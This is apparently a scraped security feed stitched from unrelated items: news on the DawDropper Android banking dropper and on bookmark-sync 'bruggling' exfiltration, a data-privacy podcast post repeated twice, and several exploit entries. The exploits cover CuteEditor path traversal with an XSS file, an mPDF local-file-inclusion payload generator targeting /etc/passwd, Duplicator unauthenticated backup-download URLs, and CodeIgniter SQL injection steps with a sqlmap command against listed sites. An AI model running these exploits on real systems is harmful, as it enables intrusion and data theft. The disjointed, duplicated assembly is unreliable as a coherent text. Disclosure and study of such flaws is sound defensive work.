PyroCMS v3.9 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.

CVE-2022-35118: AARO-Bugs/AARO-CVE-List.md at master · Accenture/AARO-Bugs

By Waqas
According to Trend Micro researchers, the DawDropper aims at stealing user data, in particular from banking apps on…
This is a post from HackRead.com Read the original post: New DawDropper Malware Targeting Android Devices via Play Store

****According to Trend Micro researchers, the DawDropper aims at stealing user data, in particular from banking apps on infected Android devices.****

Trend Micro security researchers have identified over a dozen malicious Android dropper apps containing **banking malware**. These apps are easily available on Google Play Store.

The scam is aimed at stealing users’ banking data to steal money from their banking apps. The stolen data includes PIN codes, banking credentials, passwords, etc. The malware can intercept text and gain complete control of the affected device.

> “We found a malicious campaign that uses a new dropper variant that we have dubbed as DawDropper. Under the guise of several Android apps such as Just In: Video Motion, Document Scanner Pro, Conquer Darkness, simpli Cleaner, and Unicc QR Scanner.”  
> 
> Trend Micro

Research revealed that DawDropper malware used a third-party cloud service Firebase Realtime Database to **evade detection** and obtain a payload download address. Additionally, it hosts payloads on GitHub.   

**What are Dropper Apps?**

According to researchers at Trend Micro, cybercriminals are now distributing banking trojans through dropper apps more than ever before because this technique helps them evade detection.

Dropper apps carry the malware without raising suspicion at the **Google Play Store** security mechanism. The apps are named so because of containing a payload comprising malware that these install on the infected handset. Furthermore, mobile malware is highly in demand nowadays as cybercriminals can disseminate their malware on the official Google play store.

**Malicious Apps Details  
**

The following are the names of the malicious dropper apps discovered on the Google Play Store:  

*   Fix Cleaner
*   Crypto Utils
*   Rooster VPN
*   Extra Cleaner
*   Lucky Cleaner
*   Simpli Cleaner
*   Unicc QR Scanner
*   Conquer Darkness
*   Call Recorder APK
*   Eagle photo editor
*   Call recorder pro+
*   Universal Saver Pro
*   Just In: Video Motion
*   Super Cleaner- hyper & smart
*   Document Scanner – PDF Creator

  
According to Trend Micro’s **blog post**, the DawDropper malware’s malicious payload has been linked to the Octo malware family. It is a multi-stage, modular malware. Octo is also called Coper and was previously used for targeting Colombian online banking customers. The malicious apps aren’t available on Google Play Store anymore.

**Google To Implement New Policy Changes  
**

As per the **Google support page**, the company is implementing policy changes to the Play Store. One of the changes will come into effect from September 30th, 2022.

These changes will prevent developers from displaying full-page ads in mobile games downloaded via the Play Store, or else these will have to be closed in 15 seconds unless it is an opt-in ad to unlock rewards. Moreover, the company will ban apps with copied icons, designs, logos, or titles and **various VPN apps** from August 31.

**More Android Malware News**

1.  **300,000 Android users impacted by malware apps on Play Store**
2.  **New Android malware poses as “System Update” to steal your data**
3.  **38% of Android VPN Apps on Google Play Store Plagued with Malware**
4.  **Experts concerned over emergence of new Android banking trojan S.O.V.A.**
5.  **New Android malware on Play Store disables Play Protect to evade detection**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New DawDropper Malware Targeting Android Devices via Play Store

"Bruggling" emerges as a novel technique for pilfering data out from a compromised environment — or for sneaking in malicious code and attack tools.

Bookmark synchronization has become a standard feature in modern browsers: It gives Internet users a way to ensure that the changes they make to bookmarks on a single device take effect simultaneously across all their devices. However, it turns out that this same helpful browser functionality also gives cybercriminals a handy attack path.

To wit: Bookmarks can be abused to siphon out reams of stolen data from an enterprise environment, or to sneak in attack tools and malicious payloads, with little risk of being detected.

David Prefer, an academic researcher at the SANS Technology Institute, made the discovery as part of broader research into how attackers can abuse browser functionality to smuggle data out from a compromised environment and carry out other malicious functionality.

In a recent technical paper, Prefer described the process as "bruggling" — a portmanteau of browser and smuggling. It's a novel data exfiltration vector that he demonstrated with a proof-of-concept (PoC) PowerShell script called "Brugglemark" that he developed for the purpose.

**The Fine Art of Bruggling**

"There's no weakness or vulnerability that is being exploited with the synchronization process," Prefer stresses. "What this paper hones in on is the ability to name bookmarks whatever you want, and then synchronize them to other signed-in devices, and how that very convenient, helpful functionality can be twisted and misused in an unintended way."

An adversary would already need access — either remote or physical — to the environment and would have already infiltrated it and collected the data they want to exfiltrate. They could then either use stolen browser synchronization credentials from a legitimate user in the environment or create their own browser profile, then access those bookmarks on another system where they've been synchronized to access and save the data, Prefer says. An attacker could use the same technique to sneak malicious payloads and attack tools into an environment.

The benefit of the technique is, put simply, stealth.

Johannes Ullrich, dean of research at the SANS Institute, says data exfiltration via bookmark syncing gives attackers a way to bypass most host and network-based detection tools. To most detection tools, the traffic would appear as normal browser synch traffic to Google or any other browser maker. "Unless the tools look at the volume of the traffic, they will not see it," Ullrich says. "All traffic is also encrypted, so it is a bit like DNS over HTTPs or other 'living off the cloud' techniques," he says.

**Bruggling in Practice**

In terms of how an attack might be carried out in the real world, Prefer points to an example where an attacker might have compromised an enterprise environment and accessed sensitive documents. To exfiltrate the data via bookmark synching, the attacker would first need to put the data into a form that can be stored as bookmarks. To do this, the adversary could simply encode the data into base64 format and then split the text into separate chunks and save each of those chunks as individual bookmarks.

Prefer discovered — through trial and error — that modern browsers allow a considerable number of characters to be stored as single bookmarks. The actual number varied with each browser. With the Brave browser, for example, Prefer discovered he could synchronize, very quickly, the entirety of the book _Brave New World_ using just two bookmarks. Doing the same with Chrome required 59 bookmarks. Prefer also discovered during testing that browser profiles could synchronize as many as 200,000 bookmarks at a time.

Once the text has been saved as bookmarks and synchronized, all that the attacker would need to do is sign into the browser from another device to access the content, reassemble it, and decode it from base64 back into the original text.

"As for what kind of data could be exfiltrated via this technique, I think that's up to the creativity of an adversary," Prefer says.

Prefer's research was primarily focused on browser market share leader Google Chrome — and to a lesser extent on other browsers such as Edge, Brave, and Opera, which are all based on the same open source Chromium project that Chrome is built upon. But there's no reason why bruggling won't work with other browsers such as Firefox and Safari, he notes.

**Other Use Cases**

Significantly, bookmark syncing is not the only browser function that can be abused this way, Prefer says. "There are plenty of other browser features that are used in synchronization that could be misused in a similar way, but would require research to investigate," he says. As examples, he points to autofills, extensions, browser history, stored passwords, preferences, and themes, which can all be synchronized. "With a bit of research, it might turn out that they can also be abused," Prefer says.

Ullrich says Prefer's paper was inspired by earlier research that showed how browser extension syncing could be used for data exfiltration and command and control. With that method, however, a victim would have been required to install a malicious browser extension, he says.

**Mitigating the Threat**

Prefer says organizations can mitigate the risk of data exfiltration by disabling bookmark syncing using Group Policy. Another option would be to limit the number of email domains that are allowed to sign in for syncing, so attackers would not be able to use their own account to do it.

"\[Data loss protection\] DLP monitoring that an organization already performs can be applied here as well," he says.

Bookmark syncing would not work very well if the syncing happened at a slower speed, Ullrich says. "But being able to sync 200,000+ bookmarks, and only seeing some speed throttling after 20,000 or 30,000 bookmarks makes this \[very\] valuable," he says.

Thus, browser makers can make things harder for attackers for instance by dynamically throttling bookmark syncing based on factors like the age of an account or logins from a new geographic location. Similarly, bookmarks that contain base64 encoding could be prevented from syncing, as well as bookmarks with excessive names and URLs, Prefer says.

Chromium Browsers Allow Data Exfiltration via Bookmark Syncing

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 
The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we’re bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court’s decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google’s all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn’t just because so much of our data is tracked today, but that we currently don’t know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today’s fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

March 7, 2022 - The most important and interesting security stories from the last seven days.

February 28, 2022 - This week on Lock and Code, we discuss Crisis Text Line's data-sharing agreement with its for-profit partner, which has upset many people.

Have we lost the fight for data privacy? Lock and Code S03E16

CuteEditor For PHP version 6.6 suffers from a directory traversal vulnerability.

    # Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal# Google Dork: N/A# Date: November 17th, 2021# Exploit Author: Stefan Hesselman# Vendor Homepage: http://phphtmledit.com/# Software Link: http://phphtmledit.com/download/phphtmledit.zip# Version: 6.6# Tested on: Windows Server 2019# CVE : N/AThere is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121Vulnerable code:[SNIP]  function ServerMapPath($input_path,$absolute_path,$virtual_path)  {    if($absolute_path!="")    {    return $absolute_path.str_ireplace($virtual_path,"",$input_path);    }    else    {    if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))    {    if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) {   $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));} if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) {   $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));}        return $_SERVER["DOCUMENT_ROOT"].$input_path;    }    else    {      return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path;     }    }  }[SNIP]ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56Vulnerable function (renamefile, line 57):[SNIP]switch ($action){[SNIP]  case "renamefile":    rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));    print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";    break;[SNIP]$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:C:\Inetpub\wwwroot\..\..\..\poc.htmlFinal result: writes poc.html to the webroot.STEPS:1. Create a poc.html file (XSS PoC will do).<HTML><title>Path Traversal PoC</title><BODY><h1>PoC</h1><script>alert('directory traversal');</script></BODY></HTML>2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.3. Select poc.html and select "Rename File".4. Click on the pencil icon to the right of the poc.html file.5. Rename file to "..\..\..\poc.html".6. Press OK. poc.html is written three directories up.This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.

CuteEditor For PHP 6.6 Directory Traversal

mPDF version 7.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: mPDF 7.0 - Local File Inclusion# Google Dork: N/A# Date: 2022-07-23# Exploit Author: Musyoka Ian# Vendor Homepage: https://mpdf.github.io/# Software Link: https://mpdf.github.io/# Version: CuteNews# Tested on: Ubuntu 20.04, mPDF 7.0.x# CVE: N/A#!/usr/bin/env python3from urllib.parse import quotefrom cmd import Cmdfrom base64 import b64encodeclass Terminal(Cmd):    prompt = "\nFile >> "    def default(self, args):        payload_gen(args)def banner():    banner = """                          _____  _____  ______   ______ ___  __   __                  _       _ _                            |  __ \|  __ \|  ____| |____  / _ \ \ \ / /                 | |     (_) |                 _ __ ___  | |__) | |  | | |__        / / | | | \ V /    _____  ___ __ | | ___  _| |_                | '_ ` _ \|  ___/| |  | |  __|      / /| | | |  > <    / _ \ \/ / '_ \| |/ _ \| | __|               | | | | | | |    | |__| | |        / / | |_| | / . \  |  __/>  <| |_) | | (_) | | |_                |_| |_| |_|_|    |_____/|_|       /_/ (_)___(_)_/ \_\  \___/_/\_\ .__/|_|\___/|_|\__|                                                                               | |                                                                                                 |_|   """    print(banner)def payload_gen(fname):    payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'    encoded_payload = quote(payload)    print("[+] Replace the content with the payload below")    print(f"Url encoded payload:\n{encoded_payload}\n")    base64enc = b64encode(encoded_payload.encode())    print(f"Base64 encoded payload:\n{base64enc.decode()}\n")if __name__ == ("__main__"):    banner()    print("Enter Filename eg. /etc/passwd")    terminal= Terminal()    terminal.cmdloop()

mPDF 7.0 Local File Inclusion

WordPress Duplicator plugin versions 1.4.6 and below suffer from a backup disclosure vulnerability.

    # Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download# Google Dork: N/A# Date: 07.27.2022# Exploit Author: SecuriTrust# Vendor Homepage: https://snapcreek.com/# Software Link: https://wordpress.org/plugins/duplicator/# Version: < 1.4.7# Tested on: Linux, Windows# CVE : CVE-2022-2551# Reference: https://securitrust.fr# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551#Product:WordPress Plugin Duplicator < 1.4.7#Vulnerability:1-It allows an attacker to download the backup file.#Proof-Of-Concept:1-Backup download.The backup file can be downloaded using the "is_daws" parameter.http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

WordPress Duplicator 1.4.6 Backup Disclosure

WordPress Duplicator plugin versions 1.4.7 and below suffer from an information disclosure vulnerability.

    # Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure# Google Dork: N/A# Date: 07.27.2022# Exploit Author: SecuriTrust# Vendor Homepage: https://snapcreek.com/# Software Link: https://wordpress.org/plugins/duplicator/# Version: <= 1.4.7# Tested on: Linux, Windows# CVE : CVE-2022-2552# Reference: https://securitrust.fr# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552#Product:WordPress Plugin Duplicator <= 1.4.7#Vulnerability:1-Some system information may be disclosure.#Proof-Of-Concept:1-System information.Some system information is obtained using the "view" parameter.http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

WordPress Duplicator 1.4.7 Information Disclosure

CodeIgniter CMS version 4.2.0 suffers from a remote SQL injection vulnerability.

    [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]                                                                                      [+]Exploit Title    : CodeIgniter CMS Version 4.2.0  Sql Injection Vulnerability                         [+]                                                                                         [+]Exploit Author   : E1.Coders                                           [+]                                                                                          [+]Vendor Homepage  : https://www.codeigniter.com/                                       [+]                                                                                       [+]Google Dork ONE  : searchResult/?title=[+]    [+]Google Dork Two  : Job/searchResult/?title=  [+]                                                                                     [+]Date             : 15 / 05 / 2022                                                                [+]                                                                                     [+]Tested On        : windows + linux                                              [+]                                                                                        [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION   <~ ~ ~ [+] [+] CodeIgniter CMS suffers from a remote SQL injection vulnerability. [+] "codeigniter vulnerability ::$DATA view source code"[+] Note that this find contains information about the site.[+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user.[+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database.[+] The following URLs and parameters have been confirmed to suffer from SQL injection.                                                                                        [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>  Location   <~ ~ ~                           [+] SQL ERROR Location                                                                                        [+] http://www.site.com/Job/searchResult/?title=[SQL]                                              [+] [+]~ ~ ~~ ~ ~~  ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~>   DEMO      <~ ~ ~                       [+][+][+] ERROR : https://[removed].com/Job/searchResult/?title=123%27[+][+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF'  (OR= or ==)[+][+] ERROR : https://[removed].ir/?per_page=400%2[+][+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0[+] [+] ERROR : https://[removed].com/login/       (username = '  Password = ')[+][+] ERROR : https://[removed].com/search.php?search=1'[+][+] ERROR : https://[removed].com/news.php?p=7251'[+][+] ERROR : https://[removed].com/employe/show.php?cvid=14088'[+][+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86'[+][+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1[+][+] ERROR : https://[removed].com/fa/FormView/1026'[+][+] ERROR : https://[removed].com/fa/formview/1030' [+] And Google More . . . \ .[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  Methode Attack :[+]  [+] Step 1 : Enter the URL of the page that has the problem of sql injection attacks[+] [+] Step 2 :  Add a variable "  OR ' to the end of  the URL "request"[+] To display the PHP error related to not controlling the functions that cause the attacker to attack  '[+] [+] Step 3 :  Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123"[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] About CMS :[+] [+] Codeigniter is an open source web software framework used to build dynamic websites. [+] This framework, which is written in PHP language, [+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries, [+] many of which make common tasks simple. The first public release of CodeIgniter was on February 28, 2006[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Explanation of vulnerability :[+] [+] The remote attacker can test the SQL Inject attack by injecting a 'variable' and after displaying the PHP error related to not controlling the functions that cause the SQL Inject attack[+] And the attacker can execute attacks with SQL Inject commands or execute attacks with ready tools such as Squat Map.[+] [+] All different parts of the site have this security problem[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Solution :[+] [+] [+] Use parameter input validation to be modified to prevent attacks[+] "codeigniter vulnerability ::$DATA view source code"[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

CodeIgniter CMS 4.2.0 SQL Injection

Categories: Podcast
Tags: Data privacy

Tags: facebook

Tags: Google

Tags: lock and code

Tags: lock and code podcast

Tags: malwarebytes labs

Tags: podcast

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 



(Read more...)




The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we're bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court's decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google's all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn't just because so much of our data is tracked today, but that we currently don't know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today's fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

Tag

#google